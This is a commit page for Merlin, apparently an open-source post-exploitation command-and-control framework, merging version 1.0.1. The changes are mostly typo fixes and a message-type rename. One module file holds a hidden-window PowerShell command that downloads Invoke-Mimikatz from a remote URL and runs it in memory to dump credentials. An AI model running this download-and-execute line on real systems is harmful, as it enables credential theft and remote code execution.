Merge branch 'dev'

Ne0nd0g · May 29, 2021 · 6223a6c · 6223a6c
2 parents 7ea5237 + 0752672
commit 6223a6c
Show file tree

Hide file tree

Showing 7 changed files with 19 additions and 12 deletions.
diff --git a/README.MD b/README.MD
@@ -1,5 +1,5 @@
 [![AppVeyor Build Status](https://ci.appveyor.com/api/projects/status/yadppqp12h445akx/branch/master?svg=true)](https://ci.appveyor.com/project/Ne0nd0g/merlin/branch/master)
-[![GoReportCard](https://goreportcard.com/badge/github.com/ne0nd0g/merlin)](https://goreportcard.com/badge/github.com/ne0nd0g/merlin)
+[![GoReportCard](https://goreportcard.com/badge/github.com/Ne0nd0g/merlin)](https://goreportcard.com/report/github.com/Ne0nd0g/merlin)
 [![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0)
 [![Release](https://img.shields.io/github/release/Ne0nd0g/merlin.svg)](https://github.com/Ne0nd0g/merlin/releases/latest)
 [![Downloads](https://img.shields.io/github/downloads/Ne0nd0g/merlin/total.svg)](https://github.com/Ne0nd0g/merlin/releases)

diff --git a/data/modules/windows/x64/powershell/powersploit/Invoke-Mimikatz.json b/data/modules/windows/x64/powershell/powersploit/Invoke-Mimikatz.json
@@ -22,7 +22,8 @@
     "commands": [
       "powershell.exe",
       "-nop",
-      "-w 0",
+      "-WindowStyle",
+      "0",
       "\"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');",
       "Invoke-Mimikatz",
       "{{DumpCreds.Flag}}",

diff --git a/docs/CHANGELOG.MD b/docs/CHANGELOG.MD
@@ -4,6 +4,12 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](http://keepachangelog.com/en/1.0.0/)
 and this project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html).
 
+## 1.0.1 - 2021-05-29
+
+### Fixed
+
+- [Issue 107](https://github.com/Ne0nd0g/merlin/issues/107) - RunModule() tasking uses `run` instead of removed `cmd`
+
 ## 1.0.0 - 2021-04-18
 
 ### Changed

diff --git a/pkg/api/modules/modules.go b/pkg/api/modules/modules.go
@@ -84,7 +84,7 @@ func RunModule(module modules.Module) []messages.UserMessage {
 			switch strings.ToLower(module.Type) {
 			case "standard":
 				// Standard modules use the `cmd` message type that must be in position 0
-				returnMessages = append(returnMessages, agentAPI.CMD(id, append([]string{"cmd"}, r...)))
+				returnMessages = append(returnMessages, agentAPI.CMD(id, append([]string{"run"}, r...)))
 			case "extended":
 				// Was using Method: r[0]
 				job, err := jobs.Add(id, r[0], r[1:])
@@ -105,7 +105,7 @@ func RunModule(module modules.Module) []messages.UserMessage {
 	switch strings.ToLower(module.Type) {
 	case "standard":
 		// Standard modules use the `cmd` message type that must be in position 0
-		returnMessages = append(returnMessages, agentAPI.CMD(module.Agent, append([]string{"cmd"}, r...)))
+		returnMessages = append(returnMessages, agentAPI.CMD(module.Agent, append([]string{"run"}, r...)))
 	case "extended":
 		job, err := jobs.Add(module.Agent, r[0], r[1:])
 		if err != nil {

diff --git a/pkg/handlers/http.go b/pkg/handlers/http.go
@@ -199,7 +199,7 @@ func (ctx *HTTPContext) AgentHTTP(w http.ResponseWriter, r *http.Request) {
 
 				// Verify JWT ID matches Merlin message ID
 				if agentID != k.ID || k.ID == uuid.Nil {
-					message("warn", fmt.Sprintf("Recieved a message with JWT Agent ID of %s but a Merlin "+
+					message("warn", fmt.Sprintf("Received a message with JWT Agent ID of %s but a Merlin "+
 						"message ID of %s. Returning 404", agentID, k.ID))
 					w.WriteHeader(404)
 					return
@@ -324,7 +324,7 @@ func (ctx *HTTPContext) AgentHTTP(w http.ResponseWriter, r *http.Request) {
 
 			// Verify JWT ID matches Merlin message ID
 			if agentID != j.ID || j.ID == uuid.Nil {
-				message("warn", fmt.Sprintf("Recieved a message with JWT Agent ID of %s but a Merlin "+
+				message("warn", fmt.Sprintf("Received a message with JWT Agent ID of %s but a Merlin "+
 					"message ID of %s. Returning 404", agentID, j.ID))
 				w.WriteHeader(404)
 				return

diff --git a/pkg/merlin.go b/pkg/merlin.go
@@ -18,7 +18,7 @@
 package merlin
 
 // Version is a constant variable containing the version number for the Merlin package
-const Version = "1.0.0"
+const Version = "1.0.1"
 
 // Build is the unique number based off the git commit in which it is compiled against
 var Build = "nonRelease"
diff --git a/pkg/server/jobs/jobs.go b/pkg/server/jobs/jobs.go
@@ -114,7 +114,7 @@ func Add(agentID uuid.UUID, jobType string, jobArgs []string) (string, error) {
 		job.Payload = p
 	case "invoke-assembly":
 		if len(jobArgs) < 1 {
-			return "", fmt.Errorf("exected 1 argument for the invoke-assembly command, recieved: %+v", jobArgs)
+			return "", fmt.Errorf("exected 1 argument for the invoke-assembly command, received: %+v", jobArgs)
 		}
 		job.Type = merlinJob.MODULE
 		job.Payload = merlinJob.Command{
@@ -135,7 +135,7 @@ func Add(agentID uuid.UUID, jobType string, jobArgs []string) (string, error) {
 		}
 	case "load-assembly":
 		if len(jobArgs) < 1 {
-			return "", fmt.Errorf("exected 1 argument for the load-assembly command, recieved: %+v", jobArgs)
+			return "", fmt.Errorf("exected 1 argument for the load-assembly command, received: %+v", jobArgs)
 		}
 		job.Type = merlinJob.MODULE
 		assembly, err := ioutil.ReadFile(jobArgs[0])
@@ -159,7 +159,7 @@ func Add(agentID uuid.UUID, jobType string, jobArgs []string) (string, error) {
 		}
 	case "load-clr":
 		if len(jobArgs) < 1 {
-			return "", fmt.Errorf("exected 1 argument for the load-clr command, recieved: %+v", jobArgs)
+			return "", fmt.Errorf("exected 1 argument for the load-clr command, received: %+v", jobArgs)
 		}
 		job.Type = merlinJob.MODULE
 		job.Payload = merlinJob.Command{
@@ -218,7 +218,7 @@ func Add(agentID uuid.UUID, jobType string, jobArgs []string) (string, error) {
 		}
 	case "memfd":
 		if len(jobArgs) < 1 {
-			return "", fmt.Errorf("expected 1 argument for the memfd command, recieved %d", len(jobArgs))
+			return "", fmt.Errorf("expected 1 argument for the memfd command, received %d", len(jobArgs))
 		}
 		executable, err := ioutil.ReadFile(jobArgs[0])
 		if err != nil {
@@ -308,7 +308,7 @@ func Add(agentID uuid.UUID, jobType string, jobArgs []string) (string, error) {
 	case "upload":
 		job.Type = merlinJob.FILETRANSFER
 		if len(jobArgs) < 2 {
-			return "", fmt.Errorf("expected 2 arguments for upload command, recieved %d", len(jobArgs))
+			return "", fmt.Errorf("expected 2 arguments for upload command, received %d", len(jobArgs))
 		}
 		uploadFile, uploadFileErr := ioutil.ReadFile(jobArgs[0])
 		if uploadFileErr != nil {